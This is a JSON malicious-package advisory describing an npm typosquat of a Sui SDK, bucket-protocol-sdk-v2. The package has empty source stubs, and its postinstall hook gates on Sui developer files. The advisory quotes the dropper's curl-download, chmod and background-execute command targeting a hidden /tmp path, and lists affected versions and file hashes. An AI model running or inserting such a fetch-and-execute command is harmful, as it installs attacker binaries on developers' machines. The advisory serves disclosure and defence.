{"id":"MAL-2026-4502","summary":"Malicious code in bucket-protocol-sdk-v2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4)\nbucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (`bucket.ts: export {};`, `index.ts: export * from './bucket';`) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares `\"postinstall\": \"node install.js\"`; install.js checks whether the host is a Sui developer (presence of the `sui` binary or `~/.sui/sui_config/client.yaml`) and then runs `curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper &` to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named `implantUrl` with the comment `PUT YOUR ACTUAL 0x0.st URL HERE`, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.\n","modified":"2026-05-26T06:02:15.177292589Z","published":"2026-05-20T04:04:00Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-003456","source":"amazon-inspector","modified_time":"2026-05-20T04:04:30Z","versions":["1.0.26"],"sha256":"1b25f4c8e7236236452ca049e0a8409ea8cea78d9ceb131daeea771d6365f61b","import_time":"2026-05-26T05:50:40.680023655Z"},{"id":"IN-MAL-2026-003455","source":"amazon-inspector","versions":["1.0.11"],"sha256":"5bab9298f8bac43d26a48a14cb001113d1415a38e9dbe3d78c55a8ebba95e679","modified_time":"2026-05-20T04:04:10Z","import_time":"2026-05-26T05:50:40.570388632Z"},{"id":"IN-MAL-2026-003462","source":"amazon-inspector","versions":["1.0.23"],"modified_time":"2026-05-20T04:21:39Z","sha256":"66a46f323763deecb5661ae7aa597ac73691211c718359914fef69c4322309ee","import_time":"2026-05-26T05:50:41.316971934Z"},{"id":"IN-MAL-2026-003461","source":"amazon-inspector","modified_time":"2026-05-20T04:21:14Z","versions":["1.0.12"],"sha256":"9612ba97a11244d132e6893004e23f8ba4999200709fc04dc4677a972de03155","import_time":"2026-05-26T05:50:41.208819798Z"},{"id":"IN-MAL-2026-003454","source":"amazon-inspector","sha256":"b70afaf3f61c7ec2726720fb4c7b00256bed2cd2eb65dc165cfa0fef243ecb13","modified_time":"2026-05-20T04:04:00Z","versions":["1.0.22"],"import_time":"2026-05-26T05:50:40.436204814Z"},{"id":"IN-MAL-2026-003600","source":"amazon-inspector","versions":["1.0.18"],"sha256":"e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4","modified_time":"2026-05-20T19:30:10Z","import_time":"2026-05-26T05:50:56.414273874Z"},{"id":"IN-MAL-2026-003612","source":"amazon-inspector","modified_time":"2026-05-20T20:42:07Z","sha256":"f213ad1e13ca48fd037fbad78f53b85c280b913fac9cd88632c4ad02f1fa980d","versions":["1.0.19"],"import_time":"2026-05-26T05:50:58.104269831Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.26"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.11"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.23"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.12"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.22"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.18"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.19"}],"affected":[{"package":{"name":"bucket-protocol-sdk-v2","ecosystem":"npm","purl":"pkg:npm/bucket-protocol-sdk-v2"},"versions":["1.0.26","1.0.11","1.0.23","1.0.12","1.0.22","1.0.18","1.0.19"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json","indicators":{"package_integrity":[{"filename":"bucket-protocol-sdk-v2-1.0.26.tgz","hashes":{"sha1":"d2a7ff249158e4d6e9645fde6d0bfb4a5508267a","sha512_sri":"sha512-TUDlJnnMfPILAEnK4oJLNRqnrfEBnrL1bjbdPJdLtlmcOKMC1B/SdfAhyIRqWwwOxdShRTvHXz2p6/UDEt08Kw=="}}],"evidence_files":[{"sha256":"2d541f32fa2565d1bd59984485a53d5d8e2e5d6ae8dcdcf39487df3aa74c9cce","path":"install.js","tlsh":"86f0c0d202d2b336b9200cd5e959c43aa07bc0007417e6c494c84af72243a24c753cf7"},{"sha256":"44fed77a3d0a86e89770b87608011b2f2b182bbd38aec02e3c133b30f24c032f","path":"package.json","tlsh":"fbe0d82459134bb725c496570c26a167b7255f1f4444380c2adf9b1c839f7778cfa319"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}